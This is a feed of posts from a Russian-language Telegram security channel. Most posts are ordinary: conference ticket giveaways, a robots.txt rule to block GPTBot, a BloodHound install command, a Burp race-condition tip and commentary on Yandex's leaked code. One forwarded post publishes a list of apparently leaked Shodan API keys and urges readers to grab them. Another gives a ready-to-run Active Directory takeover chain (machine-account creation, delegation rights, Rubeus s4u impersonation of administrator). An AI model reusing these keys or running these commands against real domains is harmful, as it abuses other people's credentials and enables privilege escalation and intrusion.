Похек
16.6K subscribers
2.09K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from BI.ZONE
®️ Студенты, приготовьтесь: розыгрыш бесплатных проходок на OFFZONE 2023

Если вы еще не успели купить билет на конференцию, у нас приятная новость: можно получить бесплатные проходки, решив таски на нашей CTF-платформе.

Каждый день c 7 по 13 августа в 18:00 мы будем открывать по одному заданию. Всего их будет 6 в категориях crypto, reverse engineering, web и PWN.

Первый таск появится уже сегодня!

Количество поинтов зависит от вашей скорости: первый решивший задание заработает больше всего очков. 12 студентов с лучшими результатами получат бесплатные проходки на OFFZONE 2023.

Для участия нужно вступить в чат, зарегистрироваться и указать e-mail: победителей мы попросим прислать скан или фото студенческого билета.

Участвовать
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥3
Forwarded from Russian OSINT
😷 Как запретить поисковому роботу (web crawler) 👩‍💻OpenAI лазить на ваших сайтах?

"Предоставление GPTBot доступа к вашему сайту может помочь моделям ИИ стать более точными и улучшить их общие возможности, а также безопасность", — пишет OpenAI.

♋️👉 Чтобы запретить 🤖GPTBot доступ к вашему сайту, вы можете добавить в robots.txt вашего сайта:

User-agent: GPTBot
Disallow: /

https://platform.openai.com/docs/gptbot

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
📣 Участвуйте в конкурсе и получите бесплатный билет на OFFZONE

Приветствую всех!
🎟 Я рад объявить о конкурсе на бесплатный билет на конференцию OFFZONE.

Условия конкурса:
➡️Подписаться канал.
➡️Оставьте любой комментарий под этим постом.

Срок проведения конкурса:
🎁 Конкурс будет проходить с 7 августа по 14 августа 2023 года. Победитель конкурса будет объявлен 14 августа 2023 года.

🪲 Конкурс проводится при поддержке 🕐🕑🕒 BugBounty.

®️ Что такое OFFZONE?
OFFZONE — это всегда насыщенная программа, множество развлекательных и образовательных активностей, а также мощное комьюнити.
Здесь собираются безопасники, разработчики, инженеры, исследователи, преподаватели и студенты из десятков стран мира. В центре внимания — только хардкорный технический контент по кибербезопасности. А также очень интересные не формальные беседы с опытными специалистами, руководителями компаний и т.д.

🔥 Почему стоит участвовать в конкурсе?
Участие в конкурсе — это отличная возможность получить бесплатный билет на OFFZONE, а также познакомиться с интересными специалистами из нашей сферы и возможность встретить работодателя, если ты ещё работаешь в сфере ИТ/ИБ, но есть большое желание и мотивация.

Не упустите свой шанс!

Спойлер: в этом году коллеги подготовили, что-то особенное)

Участвуйте в конкурсе и получите бесплатный билет на OFFZONE!

📩 Канал | Сайт OFFZONE
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥553🔥1
Всем доброго времени суток. Решил упростить правила конкурса и убрать необходимое правило, оставлять ссылку на канал у себя в профиле. Так что погнали ещё активнее принимать участие!
2
⚡️ BloodHound Community Edition - новая эра.

BloodHound Community Edition (CE) — это новая версия популярного инструмента для визуализации и анализа привилегий Active Directory. BloodHound CE основана на коде BloodHound Enterprise (BHE), но имеет ряд улучшений, включая новый пользовательский интерфейс, поддержку новых источников данных и более быструю визуализацию графиков. BloodHound CE также является более гибкой и настраиваемой, чем BHE.

BloodHound CE может быть использована для обнаружения уязвимостей в привилегиях Active Directory, таких как привилегии, которые могут быть использованы для получения контроля над сетью. BloodHound CE также может быть использована для моделирования атак на Active Directory и оценки риска этих атак.

Вот некоторые из ключевых улучшений, которые были внесены в BloodHound CE:
➡️ Новый пользовательский интерфейс, который более удобен в использовании и интуитивно понятен.
➡️ Поддержка новых источников данных, таких как Azure Active Directory и AWS IAM.
➡️ Более быстрая визуализация графиков.
➡️ Более гибкая и настраиваемая конфигурация.

Установка BloodHound CE одной командой:
curl -L https://github.com/SpecterOps/BloodHound/raw/main/examples/docker-compose/docker-compose.yml | sudo docker-compose up

💬 Канал | ➡️ Читать далее | 💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
22🔥1
Forwarded from Just Security
Новостной репортаж по следам церемонии награждения Pentest award. А кейсы финалистов проходят цензуру и скоро появятся в специальном выпуске журнала ][

stay tuned🙌
👍5❤‍🔥2🔥2
Не большой офф-топ закину. Не пользуйтесь библиотекой Telethon. Очень велик шанс потерять аккаунт, прочитать можно тут и на Reddit. Разраб отнекивается и говорит, что он не виноват. Но по факту у разных людей прилетает автоматически бан на акк, что ровняется удаление аккаунта навсегда, другим теневой бан прилетает. Мне ещё повезло, просто разлогинило везде, но и в аккаунт зайти не могу (получение кода по SMS отказывается работать). Если кто сталкивался с таким, отпишите в комментариях. пожалуйста.

P.S. @Jayref смог помочь, за что ему огромное спасибо
🫡31👾1
Forwarded from Proxy Bar
SHODAN keys успевайте

OefcMxcunkm72Po71vVtX8zUN57vQtAC
PSKINdQe1GyxGgecYz2191H2JoS9qvgD
pHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM
61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
xTbXXOSBr0R65OcClImSwzadExoXU4tc
EJV3A4Mka2wPs7P8VBCO6xcpRe27iNJu
mEuInz8UH1ixLGJq4oQhEiJORERVG5xc
lkY0ng0XMo29zEhzyw3ibQfeEBxghwPF
syeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd
7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik
dTNGRiwYNozXIDRf5DWyGNbkdiS5m3JK
kdnzf4fsYWQmGajRDn3hB0RElbUlIaqu
boYedPn8iDWi6GDSO6h2kz72VLt6bZ3S
FQNAMUdkeqXqVOdXsTLYeatFSpZSktdb
OygcaGSSq46Lg5fZiADAuFxl4OBbn7zm
XAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6
nkGd8uVE4oryfUVvioprswdKGmA5InzZ
XYdjHDeJM36AjDfU1feBsyMJIj8XxGzD
EBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
2
Forwarded from SHADOW:Group
Новые возможности для Race Condition

Race Condition в Burp Suite стало искать еще проще, а все благодаря добавлению возможности отправки нескольких HTTP/2 запросов в одном TCP пакете. Данный способ значительно выигрывает в эффективности и позволяет побороть сетевые задержки при отправке отдельными запросами и находить уязвимости в приложениях с очень низким временным лимитом для атаки.

Сделать это можно закинув несколько запросов в Repeater, а затем объединив их в группу. В группе надо выбрать "Group send options" и выставить "Send Group in parallel" (смотри скрин ниже). Можно также использовать turbo-intruder с шаблоном по ссылке.

Потестить, как это работает, можно на данной лабе.

#web #race #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
Forwarded from Monkey Hacker
Computer Object Takeover

Завершая играться с AD, нашел достаточно интересный сценарий, связанный с абьюзом Generic

Если в сетке есть пользователь с правами GenericWrite, то возможно зайти с повышенными привилегиями на другой тачке

Данный сценарий возможен, т.к Generic позволяет изменять DACL 🔥


Для этого мы создаем новую учетку тачки. По дефолту параметр ms-DS-MachineAccountQuota позволяет всем пользователям домена добавлять до 10 учетных записей машин

SID в принципе и сами можете вставить, но решил чуть облегчить процесс 🐈

New-MachineAccount -MachineAccount aboba -Password $(ConvertTo-SecureString
'Test@123' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer -Domain dev.domain.local aboba -Properties objectsid | select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc02.domain.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}


После этого можно использовать тот же Rubeus, для получения RC4-хэша.

Rubeus.exe hash /user:aboba /password:Test@123 /domain:dev.domain.local

И затем юзаем s4u для повышения своих привилегий за счет получения TGS

Rubeus.exe s4u /user:aboba$ /rc4:4E35B802576F770E77851BAB9D4AE172 /impersonateuser:administrator /msdsspn:cifs/dc02.domain.local /ptt

Для облегчения я юзал PowerMad и PowerView

Bye-bye 🎧
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Forwarded from Cybred
Black Hat USA 2023
Schedule
Presentations

DEF CON 31
Schedule
Presentations

Расписание (с описанием докладов) и презентации с Black Hat USA 2023 & DEF CON 31
❤‍🔥2
🎟 Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим коллегой владельцем канала Что-то на пентестерском решили увеличить ваши шансы на выигрыш!

Всё просто. От вас требуется:
1️⃣ Оставить любой комментарий под этим постом и под этим
2️⃣ Быть подписанным на Что-то на пентестерском и этот канал

🏁 До конца розыгрыша осталось: 6 часов 🔥
Ровно в 00:00 по МСК 15 числа опубликуем победителя 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥6👍211
Похек pinned a photo
Ну, что мы практически апнули 2000 подписчиков 😏
❤‍🔥62🆒1
И через 20 минут будет объявлен победитель!
Подсчет закончен. Барабанная дробь.....
🌚5
🏁Парампумпум...
🎟Победитель Brotherok
Вот пруфы

Свяжусь с ним и выдам волшебный промокод на проходку на OFFZONE
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥7👍41
Forwarded from Brotherok
Билет получен. Большая и тёплая благодарность автору канала. 🤗
👍4
Forwarded from SecAtor
Наверняка многие помнят утечку 45 гигов сырцов Яндекса, которая случилась в январе текущего года. Бомбежка тогда случилась знатная, беглым поиском нашли много чего интересного, например наличие приоритетных групп пользователей. Яндекс даже был вынужден признать возможность скрытого удаленного включения микрофона Яндекс.Станции.

Ну было и было. Яндекс же. Ему можно.

А тут на прошлой неделе случился Black Hat USA 2023. А там Кейли МакКри из Confiant сделала доклад, в котором содержался разбор этой утечки с точки зрения конфиденциальности пользователей сервисов Яндекс.

В смысле с точки зрения отсутствия этой конфиденциальности. Конкретно смотрели на Яндекс Метрику и на Крипту, инструменты веб-аналитики Яндекса.

Там пиздец, конечно, хтонических масштабов. Собирают в принципе все подряд - высоту местоположения(?), направление и скорость движения, данные базовых станций, информацию по Wi-Fi (куда ж без этого), размер пинуса etc. Сортируют пользователей на "курильщиков", "видеоблогеров", "представителей индустрии" (!) и даже "искателей отелей Рэддисон на карте". По мнению Яндекса - все это "неперсонализированные и очень ограниченные" сведения.

И это, в приципе, понятно и все обо всем догадываются. Контекстная реклама сама себя не подберет.

Но как вам, например, то, что Яндекс выстраивает графы людей, проживающих рядом? А извлечение из почты данных о билетах, посадочных талонах и бронировании отеля? А сегментирование возраста детей по их голосу, полученному через Яндекс.Станцию?

Так, на минутку, в способности Яндекса проеживать пользовательские данные по-крупному мы уже убедились - Яндекс.Еда теперь во всех пробивных ботах красуется. Равно как помним и про то, что их с помощью Regin британцы с АНБшниками в 2018 году распотрошили.

Печально все это. Хоть в скит подавайся.
6